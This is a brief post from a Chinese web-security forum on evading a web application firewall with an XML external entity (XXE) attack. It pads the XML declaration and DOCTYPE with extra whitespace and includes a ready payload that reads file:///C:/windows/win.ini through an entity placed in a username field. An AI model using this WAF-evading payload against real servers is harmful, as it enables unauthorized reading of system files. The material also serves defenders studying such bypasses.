xxe绕过waf-加多个空格-Web安全论坛-网络安全-讯岚社区

首页
论坛首页
网信安全
- 冷知识
漏洞案例

文章投稿开通会员

开通VIP

全站VIP专属资源
VIP会员专属福利
极速专属技术服务
尊享全站付费资源折扣

开通SVIP

全站SVIP专属资源
SVIP会员专属福利
极速专属技术服务
尊享全站付费资源折扣

首页
论坛首页
网信安全
- 冷知识
漏洞案例

开通会员尊享会员权益

快速登录

1

分享

QQ空间微博 QQ好友海报分享复制链接

首页
社区
网络安全
Web安全
正文

xxe绕过waf-加多个空格

徽章-创作者荣誉勋章-讯岚社区

3个月前发布

140

XML格式允许在格式化标记属性时使用任意数量的空格,因此攻击者可以在<?xml?>或<!DOCTYPE>中插入额外的空格，从而绕过此类WAF.

<?xml

version=”1.0″?>

<!DOCTYPE

test1[

<!ELEMENT

foo ANY>

<!ENTITY test

SYSTEM

“file:///C:/windows/win.ini”>

]>

<user><username>&test;</username><password>admin</password></user>

1

1人已评分

分享

QQ空间微博 QQ好友海报分享复制链接

请登录后发表评论

没有回复内容

徽章-创作者荣誉勋章-讯岚社区

20 1 1 16.4W+

这家伙很懒，什么都没有写...

最新

讯岚知道你在努力改变，这里是讯岚知识的聚集地。我们致力提供高质量的在线互联学习资源。加油！
讯岚官网联系我们讯岚招纳资源失效反馈
关注微信公众号了解最新动态

讯岚官方服务交流QQ群

本站由雨云提供服务

Copyright © 2023 夜盏小窝

领取新人见面礼

嘿，朋友！给你来点见面礼！限时免费领取，数量有限先到先得！

立即点击领取

文章投稿创建话题发布帖子

在手机上浏览此页面

登录

没有账号？立即注册

手机号或邮箱

验证码

记住登录账号密码登录

用户名/手机号/邮箱

登录密码

记住登录找回密码 | 免密登录

社交账号登录

使用社交账号登录即表示同意隐私声明

注册

已有账号，立即登录

设置用户名

手机号或邮箱

验证码

设置密码

邀请码(选填)

注册即表示同意隐私声明

扫码登录

使用其它方式登录或注册扫码登录

扫码登录即表示同意隐私声明